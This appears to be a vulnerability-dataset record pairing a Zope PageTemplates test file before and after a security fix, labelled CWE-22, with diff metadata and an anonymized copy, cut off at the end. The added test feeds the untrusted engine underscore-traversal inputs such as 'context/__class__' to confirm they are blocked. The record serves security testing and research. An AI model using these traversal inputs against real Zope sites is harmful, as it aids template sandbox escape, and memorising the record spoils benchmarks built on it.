194,
198,
201,
203,
207,
209,
211,
219,
221,
227,
234,
241,
248,
252,
267,
271,
274,
277,
283,
285,
289,
297,
299,
305,
308,
310,
314,
318,
325,
328,
331,
340,
345,
349,
358,
362,
371,
377,
385,
394,
399,
404,
418,
420,
421,
426,
427,
429,
430,
435,
436,
440,
445,
448,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
89,
90,
91,
92,
93,
94,
95,
96,
97,
98,
99,
100,
101,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
127,
128,
129,
130,
131,
132,
133,
134,
135,
154,
155,
156,
157,
158,
159,
160,
161,
162,
163,
179,
180,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
205,
206,
207,
208,
209,
210,
211,
212,
213,
214,
215,
216,
223,
224,
225,
226,
227,
228,
229,
230,
231,
232,
250,
251,
252,
253,
254,
255,
256,
257,
258,
287,
288,
289,
290,
291,
292,
293,
294,
295,
312,
313,
314,
315,
316,
317,
318,
319,
320,
321,
322,
323,
347,
348,
349,
350,
351,
352,
353,
354,
360,
361,
362,
363,
364,
365,
366,
367,
373,
374,
375,
376,
377,
378,
379,
380,
381,
382
] |
0CWE-22
| import unittest
from AccessControl import safe_builtins
from zope.component.testing import PlacelessSetup
class EngineTestsBase(PlacelessSetup):
def setUp(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def tearDown(self):
PlacelessSetup.tearDown(self)
def _makeEngine(self):
# subclasses must override
raise NotImplementedError
def _makeContext(self, bindings=None):
class Dummy:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class DummyDocumentTemplate:
__allow_access_to_unprotected_subobjects__ = 1
isDocTemp = True
def __call__(self, client=None, REQUEST={}, RESPONSE=None, **kw):
return 'dummy'
def absolute_url(self, relative=0):
url = 'dummy'
if not relative:
url = "http://server/" + url
return url
_DEFAULT_BINDINGS = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
dummy=Dummy(),
dummy2=DummyDocumentTemplate(),
eightbit=b'\xe4\xfc\xf6',
# ZopeContext needs 'context' and 'template' keys for unicode
# conflict resolution
context=Dummy(),
template=DummyDocumentTemplate(),
)
if bindings is None:
bindings = _DEFAULT_BINDINGS
return self._makeEngine().getContext(bindings)
def test_compile(self):
# Test expression compilation
e = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
e.compile(p)
e.compile('path:a|b|c/d/e')
e.compile('string:Fred')
e.compile('string:A$B')
e.compile('string:a ${x/y} b ${y/z} c')
e.compile('python: 2 + 2')
e.compile('python: 2 \n+\n 2\n')
def test_evaluate_simple_path_binding(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('one'), 1)
def test_evaluate_simple_path_dict_key_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/one'), 1)
def test_evaluate_simple_path_dict_key_string_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/b'), 'b')
def test_evaluate_with_render_simple_callable(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy'), 'dummy')
def test_evaluate_with_unimplemented_call(self):
class Dummy:
def __call__(self):
raise NotImplementedError()
dummy = Dummy()
ec = self._makeContext(bindings={'dummy': dummy})
self.assertIs(ec.evaluate('dummy'), dummy)
def test_evaluate_with_render_DTML_template(self):
# http://www.zope.org/Collectors/Zope/2232
# DTML templates could not be called from a Page Template
# due to an ImportError
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy2'), 'dummy')
def test_evaluate_alternative_first_missing(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | nothing') is None)
def test_evaluate_dict_key_as_underscore(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/_'), 'under')
def test_evaluate_dict_with_key_from_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/?blank'), 'blank')
def test_hybrid_with_python_expression_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:1+1'), 2)
def test_hybrid_with_python_expression_type_value_not_called(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:int'), int)
def test_hybrid_with_string_expression(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:x'), 'x')
def test_hybrid_with_string_expression_and_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:$one'), '1')
def test_hybrid_with_compound_expression_int_value(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | not:exists:x'))
def test_access_iterator_from_python_expression(self):
ec = self._makeContext()
ec.beginScope()
ec.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(ec.evaluate("python:repeat['loop'].odd()"))
ec.endScope()
def test_defer_expression_returns_wrapper(self):
from zope.tales.expressions import DeferWrapper
ec = self._makeContext()
defer = ec.evaluate('defer: b')
self.assertIsInstance(defer, DeferWrapper)
def test_lazy_expression_returns_wrapper(self):
from zope.tales.expressions import LazyWrapper
ec = self._makeContext()
lazy = ec.evaluate('lazy: b')
self.assertIsInstance(lazy, LazyWrapper)
def test_empty_path_expression_explicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path:'), None)
def test_empty_path_expression_explicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path: '), None)
def test_empty_path_expression_implicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(''), None)
def test_empty_path_expression_implicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(' \n'), None)
def test_unicode(self):
# All our string expressions are unicode now
eng = self._makeEngine()
ec = self._makeContext()
# XXX: can't do ec.evaluate(u'string:x') directly because ZopeContext
# only bothers compiling true strings, not unicode strings
result = ec.evaluate(eng.compile('string:x'))
self.assertEqual(result, 'x')
self.assertIsInstance(result, str)
def test_mixed(self):
# 8-bit strings in unicode string expressions cause UnicodeDecodeErrors
eng = self._makeEngine()
ec = self._makeContext()
expr = eng.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
ec.evaluate, expr)
# But registering an appropriate IUnicodeEncodingConflictResolver
# should fix it
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(ec.evaluate(expr), 'äüö')
def test_builtin_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('True'), True)
self.assertIs(ec.evaluate('False'), False)
self.assertIs(ec.evaluate('nocall: test'), safe_builtins["test"])
class UntrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
# XXX: add tests that show security checks being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
with self.assertRaises(KeyError):
ec.evaluate("nocall:open")
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), safe_builtins["list"])
class TrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
# XXX: add tests that show security checks *not* being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate("nocall:open"), open)
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), list)
class UnicodeEncodingConflictResolverTests(PlacelessSetup, unittest.TestCase):
def testDefaultResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
resolver.resolve, None, b'\xe4\xfc\xf6', None)
def testStrictResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
text = '\xe4\xfc\xe4'
self.assertEqual(resolver.resolve(None, text, None), text)
def testIgnoringResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None), '')
def testReplacingResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class ZopeContextTests(unittest.TestCase):
def _getTargetClass(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def _makeOne(self, engine=None, contexts=None):
if engine is None:
engine = self._makeEngine()
if contexts is None:
contexts = {}
return self._getTargetClass()(engine, contexts)
def _makeEngine(self):
class DummyEngine:
pass
return DummyEngine()
def test_class_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def test_instance_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def test_createErrorInfo_returns_unrestricted_object(self):
# See: https://bugs.launchpad.net/zope2/+bug/174705
context = self._makeOne()
info = context.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(info.type is AttributeError)
self.assertEqual(info.__allow_access_to_unprotected_subobjects__, 1)
| import unittest
import warnings
from AccessControl import safe_builtins
from zExceptions import NotFound
from zope.component.testing import PlacelessSetup
class EngineTestsBase(PlacelessSetup):
def setUp(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def tearDown(self):
PlacelessSetup.tearDown(self)
def _makeEngine(self):
# subclasses must override
raise NotImplementedError
def _makeContext(self, bindings=None):
class Dummy:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class DummyDocumentTemplate:
__allow_access_to_unprotected_subobjects__ = 1
isDocTemp = True
def __call__(self, client=None, REQUEST={}, RESPONSE=None, **kw):
return 'dummy'
def absolute_url(self, relative=0):
url = 'dummy'
if not relative:
url = "http://server/" + url
return url
_DEFAULT_BINDINGS = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
dummy=Dummy(),
dummy2=DummyDocumentTemplate(),
eightbit=b'\xe4\xfc\xf6',
# ZopeContext needs 'context' and 'template' keys for unicode
# conflict resolution
context=Dummy(),
template=DummyDocumentTemplate(),
)
if bindings is None:
bindings = _DEFAULT_BINDINGS
return self._makeEngine().getContext(bindings)
def test_compile(self):
# Test expression compilation
e = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
e.compile(p)
e.compile('path:a|b|c/d/e')
e.compile('string:Fred')
e.compile('string:A$B')
e.compile('string:a ${x/y} b ${y/z} c')
e.compile('python: 2 + 2')
e.compile('python: 2 \n+\n 2\n')
def test_evaluate_simple_path_binding(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('one'), 1)
def test_evaluate_simple_path_dict_key_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/one'), 1)
def test_evaluate_simple_path_dict_key_string_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/b'), 'b')
def test_evaluate_with_render_simple_callable(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy'), 'dummy')
def test_evaluate_with_unimplemented_call(self):
class Dummy:
def __call__(self):
raise NotImplementedError()
dummy = Dummy()
ec = self._makeContext(bindings={'dummy': dummy})
self.assertIs(ec.evaluate('dummy'), dummy)
def test_evaluate_with_render_DTML_template(self):
# http://www.zope.org/Collectors/Zope/2232
# DTML templates could not be called from a Page Template
# due to an ImportError
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy2'), 'dummy')
def test_evaluate_alternative_first_missing(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | nothing') is None)
def test_evaluate_dict_key_as_underscore(self):
# Traversing to the name `_` will raise a DeprecationWarning
# because it will go away in Zope 6.
ec = self._makeContext()
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(ec.evaluate('d/_'), 'under')
def test_evaluate_dict_with_key_from_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/?blank'), 'blank')
def test_hybrid_with_python_expression_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:1+1'), 2)
def test_hybrid_with_python_expression_type_value_not_called(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:int'), int)
def test_hybrid_with_string_expression(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:x'), 'x')
def test_hybrid_with_string_expression_and_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:$one'), '1')
def test_hybrid_with_compound_expression_int_value(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | not:exists:x'))
def test_access_iterator_from_python_expression(self):
ec = self._makeContext()
ec.beginScope()
ec.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(ec.evaluate("python:repeat['loop'].odd()"))
ec.endScope()
def test_defer_expression_returns_wrapper(self):
from zope.tales.expressions import DeferWrapper
ec = self._makeContext()
defer = ec.evaluate('defer: b')
self.assertIsInstance(defer, DeferWrapper)
def test_lazy_expression_returns_wrapper(self):
from zope.tales.expressions import LazyWrapper
ec = self._makeContext()
lazy = ec.evaluate('lazy: b')
self.assertIsInstance(lazy, LazyWrapper)
def test_empty_path_expression_explicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path:'), None)
def test_empty_path_expression_explicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path: '), None)
def test_empty_path_expression_implicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(''), None)
def test_empty_path_expression_implicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(' \n'), None)
def test_unicode(self):
# All our string expressions are unicode now
eng = self._makeEngine()
ec = self._makeContext()
# XXX: can't do ec.evaluate(u'string:x') directly because ZopeContext
# only bothers compiling true strings, not unicode strings
result = ec.evaluate(eng.compile('string:x'))
self.assertEqual(result, 'x')
self.assertIsInstance(result, str)
def test_mixed(self):
# 8-bit strings in unicode string expressions cause UnicodeDecodeErrors
eng = self._makeEngine()
ec = self._makeContext()
expr = eng.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
ec.evaluate, expr)
# But registering an appropriate IUnicodeEncodingConflictResolver
# should fix it
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(ec.evaluate(expr), 'äüö')
def test_builtin_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('True'), True)
self.assertIs(ec.evaluate('False'), False)
self.assertIs(ec.evaluate('nocall: test'), safe_builtins["test"])
class UntrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
# XXX: add tests that show security checks being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
with self.assertRaises(KeyError):
ec.evaluate("nocall:open")
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), safe_builtins["list"])
def test_underscore_traversal(self):
# Prevent traversal to names starting with an underscore (_)
ec = self._makeContext()
with self.assertRaises(NotFound):
ec.evaluate("context/__class__")
with self.assertRaises(NotFound):
ec.evaluate("nocall: random/_itertools/repeat")
with self.assertRaises(NotFound):
ec.evaluate("random/_itertools/repeat/foobar")
class TrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
# XXX: add tests that show security checks *not* being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate("nocall:open"), open)
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), list)
class UnicodeEncodingConflictResolverTests(PlacelessSetup, unittest.TestCase):
def testDefaultResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
resolver.resolve, None, b'\xe4\xfc\xf6', None)
def testStrictResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
text = '\xe4\xfc\xe4'
self.assertEqual(resolver.resolve(None, text, None), text)
def testIgnoringResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None), '')
def testReplacingResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class ZopeContextTests(unittest.TestCase):
def _getTargetClass(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def _makeOne(self, engine=None, contexts=None):
if engine is None:
engine = self._makeEngine()
if contexts is None:
contexts = {}
return self._getTargetClass()(engine, contexts)
def _makeEngine(self):
class DummyEngine:
pass
return DummyEngine()
def test_class_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def test_instance_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def test_createErrorInfo_returns_unrestricted_object(self):
# See: https://bugs.launchpad.net/zope2/+bug/174705
context = self._makeOne()
info = context.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(info.type is AttributeError)
self.assertEqual(info.__allow_access_to_unprotected_subobjects__, 1)
| path_disclosure | {
"code": [
" self.assertEqual(ec.evaluate('d/_'), 'under')"
],
"line_no": [
110
]
} | {
"code": [
"from zExceptions import NotFound",
" with warnings.catch_warnings():",
" self.assertEqual(ec.evaluate('d/_'), 'under')",
" ec = self._makeContext()",
" with self.assertRaises(NotFound):",
" ec.evaluate(\"context/__class__\")",
" with self.assertRaises(NotFound):",
" ec.evaluate(\"nocall: random/_itertools/repeat\")",
" ec.evaluate(\"random/_itertools/repeat/foobar\")"
],
"line_no": [
5,
114,
116,
231,
233,
234,
236,
237,
240
]
} | import unittest
from AccessControl import safe_builtins
from zope.component.testing import PlacelessSetup
class CLASS_0(PlacelessSetup):
def FUNC_0(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def FUNC_1(self):
PlacelessSetup.tearDown(self)
def FUNC_2(self):
raise NotImplementedError
def FUNC_3(self, VAR_0=None):
class CLASS_5:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class CLASS_6:
__allow_access_to_unprotected_subobjects__ = 1
VAR_16 = True
def __call__(self, VAR_17=None, VAR_18={}, VAR_19=None, **VAR_20):
return 'dummy'
def FUNC_40(self, VAR_21=0):
VAR_22 = 'dummy'
if not VAR_21:
VAR_22 = "http://server/" + VAR_22
return VAR_22
VAR_3 = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
VAR_6=CLASS_5(),
dummy2=CLASS_6(),
eightbit=b'\xe4\xfc\xf6',
VAR_14=CLASS_5(),
template=CLASS_6(),
)
if VAR_0 is None:
VAR_0 = VAR_3
return self._makeEngine().getContext(VAR_0)
def FUNC_4(self):
VAR_4 = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
VAR_4.compile(p)
VAR_4.compile('path:a|b|c/d/e')
VAR_4.compile('string:Fred')
VAR_4.compile('string:A$B')
VAR_4.compile('string:a ${x/y} b ${y/z} c')
VAR_4.compile('python: 2 + 2')
VAR_4.compile('python: 2 \n+\n 2\n')
def FUNC_5(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('one'), 1)
def FUNC_6(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/one'), 1)
def FUNC_7(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/b'), 'b')
def FUNC_8(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy'), 'dummy')
def FUNC_9(self):
class CLASS_5:
def __call__(self):
raise NotImplementedError()
VAR_6 = CLASS_5()
VAR_5 = self._makeContext(VAR_0={'dummy': VAR_6})
self.assertIs(VAR_5.evaluate('dummy'), VAR_6)
def FUNC_10(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy2'), 'dummy')
def FUNC_11(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | nothing') is None)
def FUNC_12(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/_'), 'under')
def FUNC_13(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/?blank'), 'blank')
def FUNC_14(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:1+1'), 2)
def FUNC_15(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:int'), int)
def FUNC_16(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:x'), 'x')
def FUNC_17(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:$one'), '1')
def FUNC_18(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | not:exists:x'))
def FUNC_19(self):
VAR_5 = self._makeContext()
VAR_5.beginScope()
VAR_5.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(VAR_5.evaluate("python:repeat['loop'].odd()"))
VAR_5.endScope()
def FUNC_20(self):
from zope.tales.expressions import DeferWrapper
VAR_5 = self._makeContext()
VAR_7 = VAR_5.evaluate('defer: b')
self.assertIsInstance(VAR_7, DeferWrapper)
def FUNC_21(self):
from zope.tales.expressions import LazyWrapper
VAR_5 = self._makeContext()
VAR_8 = VAR_5.evaluate('lazy: b')
self.assertIsInstance(VAR_8, LazyWrapper)
def FUNC_22(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path:'), None)
def FUNC_23(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path: '), None)
def FUNC_24(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(''), None)
def FUNC_25(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(' \n'), None)
def FUNC_26(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_10 = VAR_5.evaluate(VAR_9.compile('string:x'))
self.assertEqual(VAR_10, 'x')
self.assertIsInstance(VAR_10, str)
def FUNC_27(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_11 = VAR_9.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
VAR_5.evaluate, VAR_11)
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_5.evaluate(VAR_11), 'äüö')
def FUNC_28(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('True'), True)
self.assertIs(VAR_5.evaluate('False'), False)
self.assertIs(VAR_5.evaluate('nocall: test'), safe_builtins["test"])
class CLASS_1(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
with self.assertRaises(KeyError):
VAR_5.evaluate("nocall:open")
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), safe_builtins["list"])
class CLASS_2(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate("nocall:open"), open)
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), list)
class CLASS_3(PlacelessSetup, unittest.TestCase):
def FUNC_31(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
VAR_12.resolve, None, b'\xe4\xfc\xf6', None)
def FUNC_32(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
VAR_13 = '\xe4\xfc\xe4'
self.assertEqual(VAR_12.resolve(None, VAR_13, None), VAR_13)
def FUNC_33(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None), '')
def FUNC_34(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class CLASS_4(unittest.TestCase):
def FUNC_35(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def FUNC_36(self, VAR_1=None, VAR_2=None):
if VAR_1 is None:
VAR_1 = self._makeEngine()
if VAR_2 is None:
VAR_2 = {}
return self._getTargetClass()(VAR_1, VAR_2)
def FUNC_2(self):
class CLASS_7:
pass
return CLASS_7()
def FUNC_37(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def FUNC_38(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def FUNC_39(self):
VAR_14 = self._makeOne()
VAR_15 = VAR_14.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(VAR_15.type is AttributeError)
self.assertEqual(VAR_15.__allow_access_to_unprotected_subobjects__, 1)
| import unittest
import warnings
from AccessControl import safe_builtins
from zExceptions import NotFound
